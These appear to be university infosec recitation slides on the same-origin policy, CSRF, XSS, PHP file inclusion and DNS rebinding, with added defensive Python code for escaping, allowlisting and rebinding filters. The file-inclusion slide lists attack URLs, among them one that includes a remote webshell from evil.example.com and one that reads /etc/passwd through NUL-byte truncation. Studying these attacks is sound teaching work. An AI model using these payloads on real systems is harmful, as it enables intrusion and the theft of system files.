Introduction to InfoSec – Recitation 9

Nir Krakowski (nirkrako at post.tau.ac.il)

Itamar Gilad (itamargi at post.tau.ac.il)


Today

  • SOP - Same origin policy

  • CSRF – Cross site request Forgery

  • XSS – Cross Site Scripting

  • PHP file inclusion vulnerabilities

  • DNS rebinding (if we have time)


Same Origin Policy

  • Modern sites use elements from many different sources (e.g.: main content, embedded ads, embedded google maps controls, embedded twitter feed, etc.)

  • Without the SOP – we’d have to trust ALL that code

  • With the SOP – interactions are limited by ‘origin’

  • An origin is the combination of domain name and protocol type


SOP examples


Cross Site Request Forgery

  • User goes to malicious site

  • Site initiates a request to a different site (e.g.: Gmail)

  • Request is sent using user’s credentials

  • Site accepts request, but due to SOP – the attacker cannot read contents or state (‘blind’ attack)

  • Profit!


CSRF - Limitations

  • Cannot spoof the Referer header (but few sites check it)

  • Depends on a ‘GET’ request to cause side-effects

  • Blind attack – if the attack depends on any prior info, attacker has to guess

  • Attack must take place while the user is logged in to the target site


XSS – Cross site scripting

  • Today, many sites just aggregate user-generated content

    • Forums

    • Facebook / Twitter / Reddit

    • Web mail

    • Ynet / nrg – ‘talkbacks’

  • That’s great, but what happens if we trust user submitted content?

  • A user can submit HTML code

  • Which can be malicious


How malicious are they?

  • Once the malicious code runs in the context of the target site, it can do whatever the original site can

    • Steal javascript-accessible cookies

    • Use any aspect of the site’s API

      • Write posts

      • Add friends

      • Delete all user content

      • Send out mass-email

      • E.g.: Samy is my hero


Non persistent XSS

  • User clicks a link with extra parameters, and the server reflects them back into the page without proper sanitization


Persistent XSS

  • Malicious user submits content to the target site via

    • Forum post / ‘talkback’ / FB post, twitter post

    • E-mail

    • Etc.

  • Content is not sanitized, and therefore – displayed to the user

  • The user’s browser treats it as code from the target site, thereby bypassing the SOP

  • Profit!
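Added example (not from the slides): a Python model of the reflected case on the previous slide and of the persistent case above, which share the same root cause and the same fix, escaping at output time. The sample URL, the page template and the `TagCollector` check are constructed for this illustration; the slides' sites are PHP, but the escaping logic is identical.

```python
import html
import re
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Constructed sample link: a search page that reflects the "q" parameter.
SAMPLE_URL = "http://example.test/search?q=%3Cscript%3Ealert(1)%3C%2Fscript%3E"

def query_param(url, name):
    """First value of query parameter `name` (percent-decoded), or '' if absent."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]

def render_unsafe(text):
    """The bug: user text is reflected (or, for persistent XSS, stored and later
    echoed) straight into the page, so the browser runs it as the site's own code."""
    return "<p>Results for: " + text + "</p>"

def render_blocklist(text):
    """A common but insufficient fix: delete literal <script> tags only."""
    return "<p>Results for: " + re.sub(r"</?script[^>]*>", "", text, flags=re.I) + "</p>"

def render_safe(text):
    """The right fix: escape for the HTML text context at output time, so the
    same characters reach the browser but are displayed, not parsed as markup."""
    return "<p>Results for: " + html.escape(text, quote=True) + "</p>"

class TagCollector(HTMLParser):
    """Records every start tag and every on*= event-handler attribute."""
    def __init__(self):
        super().__init__()
        self.tags, self.handlers = [], []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.handlers += [name for name, _ in attrs if name.startswith("on")]

def active_content(page):
    """Tags other than our own <p>, plus event handlers, that a browser would
    see in the rendered page; an empty result means nothing executable got in."""
    collector = TagCollector()
    collector.feed(page)
    return [t for t in collector.tags if t != "p"], collector.handlers
```

The blocklist variant passes the obvious `<script>` case and fails on an event handler; the escaped variant passes both, which is why output encoding, not filtering, is the standard fix.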


PHP File Inclusion

Source: Wikipedia


PHP File Inclusion cont.

  • /vulnerable.php?COLOR=C:\\ftp\\upload\\exploit - Executes code from an already uploaded file called exploit.php (local file inclusion vulnerability)

  • /vulnerable.php?COLOR=C:\\notes.txt%00 - example using a NULL byte to remove the .php suffix, allowing access to files other than .php

  • /vulnerable.php?COLOR=/etc/passwd%00 - allows an attacker to read the contents of the passwd file on a UNIX system (directory traversal)

  • /vulnerable.php?COLOR=http://evil.example.com/webshell.txt? - injects a remotely hosted file containing malicious code (remote file inclusion)
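Added example (not from the slides or from Wikipedia): a Python model of the four URLs above. All of them exploit the suffix-appending idiom `include($_GET['COLOR'] . '.php')`; `classify()` names which inclusion pattern a raw `COLOR` value shows (useful as a log or WAF rule), and `resolve_theme()` is the safe replacement, mapping `COLOR` to a file only through an allowlist. `KNOWN_THEMES` and `THEMES_DIR` are assumed values for this illustration.

```python
import os
import re
from urllib.parse import unquote

# Constructed allowlist: the only theme files the application ships.
KNOWN_THEMES = {"red", "blue", "green"}
THEMES_DIR = os.path.realpath("/var/www/app/themes")  # assumed location

def vulnerable_include_target(color):
    """Models the flawed PHP idiom include($_GET['COLOR'] . '.php') verbatim.
    Note how a trailing '?' turns the appended suffix into a harmless query string."""
    return color + ".php"

def classify(raw_color):
    """Name every file-inclusion pattern a raw (percent-encoded) COLOR value shows:
    'remote', 'nul-truncation', 'absolute-path', 'traversal'. Empty list = benign."""
    value = unquote(raw_color)
    found = []
    if re.match(r"[a-z][a-z0-9+.-]*://", value, re.I):      # http://, ftp://, ...
        found.append("remote")
    if "\x00" in value:                                      # %00 cuts off ".php"
        found.append("nul-truncation")
    if value.startswith(("/", "\\")) or re.match(r"[A-Za-z]:[\\/]", value):
        found.append("absolute-path")                        # /etc/..., C:\...
    if ".." in value.replace("\\", "/").split("/"):
        found.append("traversal")
    return sorted(found)

def resolve_theme(raw_color, themes_dir=THEMES_DIR):
    """Safe replacement for the include: only allowlisted names map to a file,
    and the resolved path must still sit inside themes_dir (defence in depth).
    Returns the absolute path, or None when the request is rejected."""
    value = unquote(raw_color)
    if value not in KNOWN_THEMES:
        return None
    path = os.path.realpath(os.path.join(themes_dir, value + ".php"))
    if os.path.commonpath([themes_dir, path]) != themes_dir:
        return None
    return path
```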


Questions?


DNS Rebinding CSRF

  • We’ll discuss a very specific example

  • Client has a home router, which we want to access

  • We can get the client to browse to attacker.com

  • But thanks to the SOP – JS code from attacker.com cannot access the router other than blindly (CSRF)


Enter DNS Rebinding

  • The DNS for attacker.com returns two records:

    • Our web server public address

    • The requesting client’s address

  • By default, a browser will use the first address, and download our malicious JavaScript

  • That Javascript will make another request to attacker.com

  • But this time – the server will refuse the connection

  • The browser will happily try the next entry


DNS Rebinding cont.

  • But that’s the client’s home router public address…

  • Which should be protected via a FW from access…

  • But since most routers are configured with interface-based rules, and have internal webservers that listen on 0.0.0.0:80 – it won’t matter – they will answer our client

  • So now our JS code can connect to attacker.com and access the home router!

  • And it can still connect back outside


DNS Rebinding doesn’t work anymore

  • Most routers will use HTTP-authentication

  • You used to be able to browse to: http://user:[email protected]/

  • But it has been disabled. All HTTP auth now requires a user dialog

  • Which makes the attack infeasible

  • Also, there are some browser and network mitigations one can do (DNS pinning, DNS filtering, NoScript, etc.)
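Added example (not from the slides): two of the mitigations just listed, in Python. `filter_dns_answers()` is the DNS-filtering check a resolver can apply to the two-record answer from the earlier slides, and `host_header_allowed()` is the Host-header check a router's embedded web server can apply, which defeats the "listens on 0.0.0.0:80" problem because the rebound request still carries `Host: attacker.com`. The addresses are constructed from documentation ranges.

```python
import ipaddress

# Constructed: what attacker.com's DNS returns in the scenario on the slides,
# the attacker's public web server first, then the victim's own public address.
REBINDING_ANSWER = ["203.0.113.10", "198.51.100.77"]

# Ranges an external name should never resolve to (what "DNS filtering" means
# in practice, e.g. a resolver's stop-rebind option).
REBIND_BLOCKED = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "::1/128", "fc00::/7", "fe80::/10")]

def filter_dns_answers(addresses, client_public_ip=None):
    """Drop answers that point at internal ranges, and, when the resolver knows
    the client's own public address (a home router does), drop that too: the
    slides' second record is exactly the client's WAN address, which no
    private-range check would catch."""
    kept = []
    for addr in addresses:
        ip = ipaddress.ip_address(addr)
        if any(ip in net for net in REBIND_BLOCKED):
            continue
        if client_public_ip and ip == ipaddress.ip_address(client_public_ip):
            continue
        kept.append(addr)
    return kept

def host_header_allowed(host_header, own_names):
    """Embedded-web-server check: accept a request only if its Host header names
    the device itself. A rebound request from attacker.com's JavaScript carries
    Host: attacker.com, so it is refused before any handler runs.
    (Strips an optional :port; IPv6 literals are not handled in this model.)"""
    host = host_header.strip().lower().split(":")[0]
    return host in {name.lower() for name in own_names}
```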


Questions?
